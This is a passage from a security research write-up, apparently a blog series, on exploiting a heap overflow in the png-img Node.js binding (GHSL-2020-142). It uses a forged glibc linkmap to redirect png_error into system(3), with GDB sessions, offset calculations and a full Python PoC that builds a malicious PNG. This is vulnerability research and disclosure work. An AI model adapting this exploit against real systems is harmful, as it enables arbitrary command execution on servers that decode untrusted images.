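   the start or does not fall on a row boundary. */
uint64_t rows_until(uint64_t start, uint64_t target, uint32_t rowbytes)
{
    if (rowbytes == 0 || target < start || (target - start) % rowbytes != 0)
        return 0;

    return (target - start) / rowbytes;
}
```

With data_ at 0x271f0c0 and 16 byte rows, the linkmap at 0x2722a10 starts at row 0x395 and the png_ptr data at 0x2722ef0 starts at row 0x3e3. These numbers only hold for the heap layout shown above.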

We note that, since Symbol table entries are 24 bytes, and the st_value field is at offset 8 in the Symbol structure, the libc pointer we select from the node binary GOT that is acting as the st_value has to live at offset 8 from a 24 byte aligned index. For example, a relocation record specifying a Symtab index of 1 would imply fetching the value at offset 32 in the node GOT as the Symbol st_value.
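The alignment constraint is easy to get wrong, so here is a minimal Python sketch of the arithmetic. The helper names are ours and purely illustrative. The only facts it relies on are the 24 byte entry size and the st_value offset of 8 described above.

```python
ELF64_SYM_SIZE = 24   # size of one symbol table entry
ST_VALUE_OFFSET = 8   # offset of st_value inside an entry


def st_value_offset(sym_index):
    """Byte offset, from the start of the fake symbol table, of st_value for sym_index."""
    return sym_index * ELF64_SYM_SIZE + ST_VALUE_OFFSET


def sym_index_for_slot(table_base, slot_addr):
    """Return the symbol index whose st_value overlays slot_addr, or raise if misaligned."""
    delta = slot_addr - table_base - ST_VALUE_OFFSET
    if delta < 0 or delta % ELF64_SYM_SIZE:
        raise ValueError("slot does not line up with an st_value field")
    return delta // ELF64_SYM_SIZE


# Symtab index 1 reads its st_value from offset 32, as in the example above.
print(st_value_offset(1))
```

A GOT slot is only usable as a fake st_value when sym_index_for_slot does not raise. This is the same condition the PoC checks before building its relocation record.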

We also note that the st_other field of our fake symbol entry decides whether or not we go down a more involved symbol lookup path in _dl_fixup based on symbol visibility. Since we like to keep things simple where possible, the GOT entry prior to the one populating our st_value field should fail the if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0) check in _dl_fixup. This really just means that the lower 2 bits of the st_other field (the sixth byte of the entry, at offset 5) in our fake symbol table entry should not be 0. This requires some level of luck, but most GOT sections will contain pointers that fit this requirement. The visibility checks are performed using the following macros:

elf.h:


/* How to extract and insert information held in the st_other field.  */
#define ELF32_ST_VISIBILITY(o)  ((o) & 0x03)


/* For ELF64 the definitions are the same.  */
#define ELF64_ST_VISIBILITY(o)  ELF32_ST_VISIBILITY (o)


/* Symbol visibility specification encoded in the st_other field.  */
#define STV_DEFAULT     0               /* Default symbol visibility rules */
#define STV_INTERNAL    1               /* Processor specific hidden class */
#define STV_HIDDEN      2               /* Sym unavailable in other modules */
#define STV_PROTECTED   3               /* Not preemptible, not exported */
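To make the check concrete, here is a small Python sketch that applies the same mask to a candidate GOT entry. It assumes a little-endian 64-bit target, where the 8 byte GOT entry preceding our st_value slot supplies the first 8 bytes of the fake symbol, so st_other is byte 5 of that entry. The function names and the sample pointer values are illustrative only.

```python
ST_OTHER_BYTE = 5  # offset of st_other inside a 64-bit symbol table entry


def fake_st_other(preceding_got_entry):
    """Extract the byte that _dl_fixup would read as st_other (little-endian)."""
    return (preceding_got_entry >> (ST_OTHER_BYTE * 8)) & 0xff


def skips_full_lookup(preceding_got_entry):
    """True when the visibility bits are non-zero, i.e. the simple path is taken."""
    return (fake_st_other(preceding_got_entry) & 0x03) != 0


# A typical userland library pointer has 0x7f in byte 5, so the low 2 bits are set.
print(skips_full_lookup(0x00007ffff6ac6fc0))
# An unresolved or low (non-PIE binary) pointer has 0x00 there and would not work.
print(skips_full_lookup(0x0000000000400000))
```

This is why resolved libc pointers in the 0x00007f... range tend to satisfy the requirement, while entries that still point into the non-PIE binary itself do not.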

On our test platform, the node binary GOT entry for getsockopt serves the purpose well. It is preceded by a pointer value that will fail the ST_VISIBILITY check, which saves us from having to satisfy the much more involved resolver logic with our linkmap. So we will use getsockopt to offset to the desired system libc destination. The difference between these two libc offsets will be the delta value we set in our linkmap’s l_addr field.

Let’s first gather all the address info we need from the node binary.

# grab the libc offsets of getsockopt and system using readelf -s
anticomputer@dc1:~$ readelf -s /lib/x86_64-linux-gnu/libc-2.27.so
...
  1403: 000000000004f550    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5
   959: 0000000000122830    36 FUNC    WEAK   DEFAULT   13 getsockopt@@GLIBC_2.2.5

# determine the node binary GOT entry for getsockopt with readelf -r
anticomputer@dc1:~$ readelf -r /usr/bin/node | grep getsockopt
00000264d8f8  011800000007 R_X86_64_JUMP_SLO 0000000000000000 getsockopt@GLIBC_2.2.5 + 0

# grab the node GOT section start address with readelf -t
anticomputer@dc1:~$ readelf -t /usr/bin/node
There are 40 section headers, starting at offset 0x274f120:

Section Headers:
  [Nr] Name
       Type              Address          Offset            Link
       Size              EntSize          Info              Align
       Flags
…
  [26] .got
       PROGBITS         000000000264d038  000000000204d038  0
       0000000000000fc8 0000000000000008  0                 8
       [0000000000000003]: WRITE, ALLOC
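With the two libc offsets in hand, the l_addr delta can be sanity checked in a few lines of Python. This is a sketch of the arithmetic only. The libc base used below is a made-up value for illustration, since the real base changes per run under ASLR.

```python
MASK64 = 0xffffffffffffffff

LIBC_SYSTEM_OFF = 0x4f550        # from readelf -s above
LIBC_GETSOCKOPT_OFF = 0x122830   # from readelf -s above


def l_addr_delta(src_off, dst_off):
    """64-bit wrapping delta that turns a pointer to src into a pointer to dst."""
    return (dst_off - src_off) & MASK64


def apply_delta(delta, pointer):
    """Model the resolver's l_addr + st_value addition with 64-bit wraparound."""
    return (delta + pointer) & MASK64


delta = l_addr_delta(LIBC_GETSOCKOPT_OFF, LIBC_SYSTEM_OFF)
hypothetical_libc_base = 0x7f0000000000  # illustrative only
resolved = apply_delta(delta, hypothetical_libc_base + LIBC_GETSOCKOPT_OFF)
print(hex(delta), resolved == hypothetical_libc_base + LIBC_SYSTEM_OFF)
```

Because system lives below getsockopt in this libc, the delta is a large value that relies on unsigned wraparound. It is independent of the libc base, which is what lets us ignore ASLR for this step.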

Next we have to scour node’s .data section for a heap pointer that points into data we control at offset 285 x 24 (the reloc_arg index for png_error multiplied by the 24 byte relocation record size). With a little GDB scripting we can quickly find candidates that fit the bill. Our script will search the node .data section to look for heap pointers that are in or near our region of controlled data.

Note: these heap addresses will change per run with ASLR enabled, so this scripting example is only relevant to our snapshot debugging session. However, because the node binary is not built as a PIE, the .data location itself stays constant across runs, and we expect it to hold a usable heap pointer at the time of a live exploitation attempt.

gef➤  set $c=(unsigned long long *)0x264c000
gef➤
gef➤  set $done=1
gef➤  while ($done)
 >if ((*$c&0xffffffffffff0000)==0x02720000)
  >set $done=0
  >end
 >set $c=$c+1
 >end
gef➤  p/x $c
$551 = 0x26598c8
gef➤  x/3gx (*($c-1))+285*24
0x2726508:      0x00007fff00000013      0x0000000000000000
0x2726518:      0x0000000000000021
gef➤  set $done=1
gef➤  while ($done)
 >if ((*$c&0xffffffffffff0000)==0x02720000)
  >set $done=0
  >end
 >set $c=$c+1
 >end
gef➤  p/x $c
$552 = 0x265b9e8
gef➤  x/3gx (*($c-1))+285*24
0x2722f10:      0x4141414141414141      0x4141414141414141
0x2722f20:      0x4141414141414141
gef➤  x/x 0x265b9e0
0x265b9e0 <_ZN4node9inspector12_GLOBAL__N_1L21start_io_thread_asyncE+32>:       0x0000000002721458
gef➤


So we found a potentially usable .data location (0x265b9e0) that will contain a heap pointer which at offset 285 x 24 will point to controlled data.
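The same search can be sketched offline in Python against a raw dump of the .data section. This is an assumption-laden analogue of the GDB loop above, not the script we actually ran: the function name, the idea of working from a byte dump, and the controlled region bounds passed in are all illustrative.

```python
import struct

RELOC_ARG = 285    # reloc_arg index for the png_error resolve
RELOC_SIZE = 24    # size of one relocation record


def find_candidates(dump, dump_base, ctrl_start, ctrl_end, reloc_arg=RELOC_ARG):
    """Scan a little-endian qword dump for pointers whose indexed record is controlled.

    Returns (location, pointer, record_address) tuples for every qword where
    pointer + reloc_arg * 24 lands fully inside [ctrl_start, ctrl_end).
    """
    hits = []
    for off in range(0, len(dump) - 7, 8):
        (ptr,) = struct.unpack_from('<Q', dump, off)
        record = ptr + reloc_arg * RELOC_SIZE
        if ctrl_start <= record and record + RELOC_SIZE <= ctrl_end:
            hits.append((dump_base + off, ptr, record))
    return hits


# Three qwords modelled on the session above; only the last one qualifies.
sample = struct.pack('<QQQ', 0, 0x2724a50, 0x2721458)
for loc, ptr, rec in find_candidates(sample, 0x265b9d0, 0x2722f10, 0x2723090):
    print(hex(loc), hex(ptr), hex(rec))
```

Checking the full record against the controlled range, rather than matching on the upper address bits as the GDB loop does, filters out near misses such as the first candidate in the session above.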

Finally, we have to find a location in the node binary that at +8 contains a pointer to node’s .got section. This is trivial to find, as the node binary will have references to its various binary sections.

objdump -h:
 25 .got          00000fc8  000000000264d038  000000000264d038  0204d038  2**3


(gdb) set $p=(unsigned long long *)0x400000 # search from node .text base upwards
(gdb) while (*$p!=0x000000000264d038)
 >set $p=$p+1
 >end
(gdb) x/x $p
0x244cf20:      0x000000000264d038
(gdb)


Now that we have gathered all our ingredients, we can write our final PoC exploit. To recap, we are going to construct a fake linkmap that adheres to the following constraints:

  1. The l_addr field will be a delta between libc’s getsockopt offset and libc’s system offset
  2. The l_info[DT_STRTAB] entry will be some valid pointer value, as we’re aiming to skip string based symbol lookups it just needs to be able to dereference safely
  3. The l_info[DT_SYMTAB] entry will be a pointer to a location that at +8 contains a pointer to the start of node’s .got section
  4. The l_info[DT_JMPREL] entry will be a pointer to a location that at +8 contains a heap pointer that points to a controlled fake relocation record at offset 285 x 24 based on the reloc_arg value for the png_error resolve
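The constraints above translate into a handful of fixed offsets inside the fake linkmap. The sketch below assumes that l_info starts 64 bytes into the structure on our glibc 2.27 x86_64 target, which is consistent with the padding used in the PoC in Appendix A. The builder function and its filler value are illustrative, and the offset would need to be rechecked for any other glibc build.

```python
import struct

L_INFO_OFFSET = 64   # assumption: eight 8-byte fields precede l_info on this target
DT_STRTAB, DT_SYMTAB, DT_JMPREL = 5, 6, 23   # standard ELF dynamic tags


def l_info_offset(tag):
    """Byte offset of l_info[tag] from the start of the linkmap."""
    return L_INFO_OFFSET + 8 * tag


def build_fake_linkmap(l_addr, strtab_p, symtab_p, jmprel_p, filler=0x5050505050505050):
    """Lay out only the fields the simple _dl_fixup path reads; pad everything else."""
    size = l_info_offset(DT_JMPREL) + 8
    buf = bytearray(struct.pack('<Q', filler) * (size // 8))
    struct.pack_into('<Q', buf, 0, l_addr)
    struct.pack_into('<Q', buf, l_info_offset(DT_STRTAB), strtab_p)
    struct.pack_into('<Q', buf, l_info_offset(DT_SYMTAB), symtab_p)
    struct.pack_into('<Q', buf, l_info_offset(DT_JMPREL), jmprel_p)
    return bytes(buf)


print([hex(l_info_offset(t)) for t in (DT_STRTAB, DT_SYMTAB, DT_JMPREL)])
```

Writing fields by offset rather than by counting pad qwords makes it harder to shift an entry by one slot when adapting the layout.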

Our fake relocation record will supply an index into our fake symbol table (the node binary .got section) such that the symbol’s st_value field is the previously resolved libc pointer to getsockopt. It will also supply a relocation offset into a safe-to-write memory area so that we survive the final relocation write in _dl_fixup.

The resolver will add the libc delta we’ve set into the linkmap’s l_addr field to the fake symbol’s st_value field which contains the resolved getsockopt libc function pointer value. The result of this addition will be the libc address of the system(3) function.
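To check that the pieces fit together, we can model the part of _dl_fixup we care about in Python. This is a deliberately simplified sketch: it only covers the non-default visibility path, takes the symbol table and relocation record as raw bytes, and ignores everything else the real resolver does. The libc base and GOT contents in the usage example are invented for illustration.

```python
import struct

MASK64 = 0xffffffffffffffff
SYM_SIZE = 24
R_X86_64_JUMP_SLOT = 7


def model_dl_fixup(l_addr, symtab, reloc):
    """Return (write_address, resolved_value) for one fake relocation record."""
    r_offset, r_info, _r_addend = struct.unpack('<QQQ', reloc)
    if r_info & 0xffffffff != R_X86_64_JUMP_SLOT:
        raise ValueError("relocation type must be a jump slot")
    sym_off = (r_info >> 32) * SYM_SIZE
    if symtab[sym_off + 5] & 0x03 == 0:
        raise NotImplementedError("default visibility: full lookup path not modeled")
    (st_value,) = struct.unpack_from('<Q', symtab, sym_off + 8)
    write_addr = (l_addr + r_offset) & MASK64   # where the resolved pointer is stored
    value = (l_addr + st_value) & MASK64        # what the caller ends up jumping to
    return write_addr, value


base = 0x7f0000000000                               # hypothetical libc base
delta = (0x4f550 - 0x122830) & MASK64               # system - getsockopt
got = struct.pack('<Q', base + 0x1000) * 280        # filler libc-like pointers
got += struct.pack('<QQ', base + 0x122830, 0)       # getsockopt slot, then padding
reloc = struct.pack('<QQQ', (0x264f000 - delta) & MASK64, (93 << 32) | 7, 0)
write_addr, value = model_dl_fixup(delta, got, reloc)
print(hex(write_addr), value == base + 0x4f550)
```

Note that the relocation offset has to be pre-compensated by the delta, because the resolver adds l_addr to r_offset as well as to st_value.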

Since we’ve also corrupted the png_ptr argument to png_error, when we finally jump into system(3) from the hijacked _dl_resolve for png_error, we are able to supply and execute arbitrary commands. For our PoC we will execute “touch /tmp/itworked”.

We prepare our exploit trigger PNG with our PoC exploit script and move the resulting PNG file into our debugging environment:

λ ~ › python3 x_trigger.py
λ ~ › file trigger.png
trigger.png: PNG image data, 16 x 268435968, 8-bit grayscale, non-interlaced
λ ~ ›  scp trigger.png anticomputer@builder:~/
trigger.png                                   100% 1024     1.7MB/s   00:00
λ ~ ›
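The odd looking height of 268435968 reported by file is what makes the allocation wrap. A short Python sketch of that arithmetic follows, assuming the size of data_ is computed as height times rowbytes in 32 bits, as the wrapping comment in the PoC suggests. The function names are ours.

```python
def wrapping_height(rowbytes, wanted_alloc):
    """Smallest height above 2**32 / rowbytes whose 32-bit product equals wanted_alloc."""
    if wanted_alloc % rowbytes:
        raise ValueError("allocation size must be a multiple of rowbytes")
    return (1 << 32) // rowbytes + wanted_alloc // rowbytes


def alloc_size_32bit(height, rowbytes):
    """Model a 32-bit multiplication that silently discards the overflow."""
    return (height * rowbytes) & 0xffffffff


height = wrapping_height(16, 0x2010 - 0x10)   # chunk size minus the chunk header
print(height, hex(alloc_size_32bit(height, 16)))
```

The decoder still iterates over the full height, so every row after the first 0x200 is written past the end of the undersized buffer.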

Let’s run the vulnerable node application inside of a debugger first, with a breakpoint set on system(3):

gef➤  r ~/pngimg.js
...
[#0] 0x7ffff6ac6fc0 → do_system(line=0x2722ef0 "touch /tmp/itworked #", 'P' <repeats 11 times>, "\340\"r\002")
[#1] 0x7ffff4030e63 → png_read_row()
[#2] 0x7ffff4032899 → png_read_image()
[#3] 0x7ffff40226d8 → PngImg::PngImg(char const*, unsigned long)()
[#4] 0x7ffff401c8fa → PngImgAdapter::New(Nan::FunctionCallbackInfo<v8::Value> const&)()
[#5] 0x7ffff401c56f → _ZN3Nan3impL23FunctionCallbackWrapperERKN2v820FunctionCallbackInfoINS1_5ValueEEE()
[#6] 0xb9041b → v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<true>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments)()
[#7] 0xb9277d → v8::internal::Builtins::InvokeApiFunction(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::HeapObject>)()
[#8] 0xea2cc1 → v8::internal::Execution::New(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*)()
[#9] 0xb28ed6 → v8::Function::NewInstanceWithSideEffectType(v8::Local<v8::Context>, int, v8::Local<v8::Value>*, v8::SideEffectType) const()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Thread 1 "node" hit Breakpoint 1, do_system (line=0x2722ef0 "touch /tmp/itworked #", 'P' <repeats 11 times>, "\340\"r\002") at ../sysdeps/posix/system.c:56
56      {
gef➤  p "success!"
$1 = "success!"
gef➤

Great! Seems everything is working from our debugging session. Now let’s try it without a debugger attached.

anticomputer@dc1:~/glibc/glibc-2.27/elf$ rm /tmp/itworked
anticomputer@dc1:~/glibc/glibc-2.27/elf$ /usr/bin/node ~/pngimg.js
Segmentation fault (core dumped)
anticomputer@dc1:~/glibc/glibc-2.27/elf$ ls -alrt /tmp/itworked
-rw-rw-r-- 1 anticomputer anticomputer 0 Nov 23 20:53 /tmp/itworked
anticomputer@dc1:~/glibc/glibc-2.27/elf$

Even though we do crash the node process due to our heap corruption, it only crashes after our arbitrary command is executed.

Mission accomplished.

Our PoC exploitation journey is now complete. We have successfully established a full path to exploitation for the png-img FFI bug. While, from an attacker perspective, reliability remains a concern in terms of real world exploitation, this is sufficient for us to establish the potential impact of this vulnerability.

You can find the full exploit in Appendix A.

Conclusion

In this series we’ve taken you from a very high level introduction to the native attack surface of interpreted languages to the depths of exploitation of an actual Node.js FFI vulnerability. We restricted ourselves to only exploiting bugs that were introduced in the bindings themselves. The ultimate goal of this series was to demonstrate how memory safety vulnerabilities can creep into interpreted language applications via FFI based attack surface. We then took you on an exploit development journey to demonstrate how an attacker evaluates the bugs in your code for potential exploitation.

Appendix A - png-img PoC exploit

# PoC exploit for GHSL-2020-142, linkmap hijack demo


"""
anticomputer@dc1:~/glibc/glibc-2.27/elf$ uname -a
Linux dc1 4.15.0-122-generic #124-Ubuntu SMP Thu Oct 15 13:03:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux


anticomputer@dc1:~/glibc/glibc-2.27/elf$ node -v
v10.22.0


anticomputer@dc1:~/glibc/glibc-2.27/elf$ npm list png-img
/home/anticomputer
└── png-img@2.3.0


anticomputer@dc1:~/glibc/glibc-2.27/elf$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS"
"""


from PIL import Image
import os
import struct
import sys
import zlib


def patch(path, offset, data):
    # overwrite len(data) bytes at the given file offset, in place
    with open(path, 'r+b') as f:
        f.seek(offset)
        f.write(data)


# libc binary info
libc_system_off = 0x000000000004f550
libc_getsockopt_off = 0x0000000000122830
libc_delta = (libc_system_off - libc_getsockopt_off) & 0xffffffffffffffff


# node binary info
node_getsockopt_got = 0x00000264d8f8
node_got_section_start = 0x000000000264d038
node_safe_ptr = 0x000000000264e000 + 0x1000


# calculate which symbol table index aligns the getsockopt GOT entry as sym->st_value
# (st_value is the second 8-byte slot of each 24-byte, i.e. 3-slot, symbol entry)
node_reloc_index_wanted = (node_getsockopt_got - node_got_section_start) // 8 - 1
if node_reloc_index_wanted % 3:
    print("[x] node .got entry not aligned to symbol table entry size ...")
    sys.exit(1)
node_reloc_index = node_reloc_index_wanted // 3


# our l_info['DT_SYMTAB'] entry is pointer that at +8 has a pointer to node's got section
dt_symtab_p = 0x244cf20-8


# our l_info['DT_JMPREL'] entry is a pointer that at +8 has a heap pointer to our fake reloc records
dt_jmprel_p = 0x265b9e0-8


# our l_info['DT_STRTAB'] entry is just some valid pointer since we skip string lookups,
# so the DT_SYMTAB pointer is reused for it when the fake linkmap is built below
dt_strtab_p = dt_symtab_p


# build our heap overwrite
trigger = 'trigger.png'
heap_rewrite = b''
# pixel bits is 8, set rowbytes to 16 via width
width = 0x10
heap_data_to_linkmap_off = 0x3950-0x10 # offset from data_ chunk to linkmap chunk
heap_data_chunk_size = 0x2010 # needs to be aligned on width
heap_linkmap_chunk_size = 0x4e0


# spray fake reloc records up until linkmap chunk data
fake_reloc_record = b''
fake_reloc_record += struct.pack('<Q', (node_safe_ptr - libc_delta) & 0xffffffffffffffff) # r_offset
fake_reloc_record += struct.pack('<Q', (node_reloc_index<<32) | 7) # r_info, type: ELF_MACHINE_JMP_SLOT
fake_reloc_record += struct.pack('<Q', 0xdeadc0dedeadc0de) # r_addend
reloc_record_spray = b''
reloc_align = b''
reloc_record_spray += reloc_align
reloc_record_spray += fake_reloc_record * int((heap_data_to_linkmap_off-len(reloc_align))/24)
reloc_record_spray += b'P' * (heap_data_to_linkmap_off-len(reloc_record_spray))


heap_rewrite += reloc_record_spray


# linkmap chunk overwrite
fake_linkmap = b''
# linkmap chunk header
fake_linkmap += struct.pack('<Q', 0x4141414141414141)
fake_linkmap += struct.pack('<Q', 0x4141414141414141) # keep PREV_INUSE
# start of linkmap data
fake_linkmap += struct.pack('<Q', libc_delta) # l->l_addr
fake_linkmap += struct.pack('<Q', 0xdeadc1dedeadc0de) * 12 # pad
fake_linkmap += struct.pack('<Q', dt_symtab_p) # l->l_info[5] DT_STRTAB
fake_linkmap += struct.pack('<Q', dt_symtab_p) # l->l_info[6] DT_SYMTAB
fake_linkmap += struct.pack('<Q', 0xdeadc2dedeadc0de) * 16 # pad
fake_linkmap += struct.pack('<Q', dt_jmprel_p) # l->l_info[23] DT_JMPREL
# pad up until png_ptr chunk
fake_linkmap += b'P' * (heap_linkmap_chunk_size-len(fake_linkmap))


heap_rewrite += fake_linkmap


# png_ptr chunk overwrite, this is where we pack our argument to system(3)
cmd = b'touch /tmp/itworked #'
png_ptr = b''
# png_ptr chunk header
png_ptr += struct.pack('<Q', 0x4141414141414141)
png_ptr += struct.pack('<Q', 0x4141414141414141) # keep PREV_INUSE
# start of png_ptr data
png_ptr += cmd
# align on 8
png_ptr += b'P' * (8 - (len(png_ptr) % 8))
# postpend with another reloc record spray just to up our chances
png_ptr += b'P' * 8 # align records here
png_ptr += fake_reloc_record * 16


heap_rewrite += png_ptr


# create a template PNG with a valid height for our row_data
row_data = heap_rewrite + b'P' * (width-(len(heap_rewrite)%width)) # align row data to row width
#row_data = 0x20000 * b'A'
im = Image.frombytes("L", (width, len(row_data) // width), row_data)
im.save(trigger, "PNG")


# patch in a wrapping size to trigger overwrap and underallocation to desired data chunk size
patch(trigger, 20,
      struct.pack('>L',
                  (int((0xffffffff/width))+1) +
                  int((heap_data_chunk_size-0x10)/width))) # minus chunk header


# fix up the IHDR CRC so png_read_info doesn't freak out
with open(trigger, 'rb') as f:
    f.seek(16)  # IHDR data starts after the 8-byte signature, length and chunk type
    ihdr_data = f.read(13)
crc = zlib.crc32(ihdr_data, zlib.crc32(b'IHDR') & 0xffffffff) & 0xffffffff
patch(trigger, 29, struct.pack('>L', crc))


# for playing with the early file allocation itself: pad the file to a fixed size
f_size_wanted = 1024
f_size = os.path.getsize(trigger)
with open(trigger, 'ab') as f:
    f.write(b'P' * max(0, f_size_wanted - f_size))
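When adapting the script, a quick way to confirm that the patched header is still acceptable to a PNG parser is to recheck the IHDR CRC. The helper below is a minimal sketch that is not part of the original exploit. It relies only on the standard PNG layout of an 8 byte signature followed by the IHDR chunk, and the function name is ours.

```python
import struct
import zlib

PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'


def ihdr_crc_ok(png):
    """Check that the stored IHDR CRC matches the chunk type plus its 13 data bytes."""
    if png[:8] != PNG_SIGNATURE or png[12:16] != b'IHDR' or len(png) < 33:
        return False
    (stored,) = struct.unpack_from('>L', png, 29)
    return (zlib.crc32(png[12:29]) & 0xffffffff) == stored


# Build a minimal header for a 16 x 512 8-bit grayscale image and verify it.
ihdr = b'IHDR' + struct.pack('>LLBBBBB', 16, 512, 8, 0, 0, 0, 0)
header = PNG_SIGNATURE + struct.pack('>L', 13) + ihdr
header += struct.pack('>L', zlib.crc32(ihdr) & 0xffffffff)
print(ihdr_crc_ok(header))
```

Patching the height at file offset 20 without recomputing the CRC makes this check fail, which is the failure the fix-up step in the script avoids.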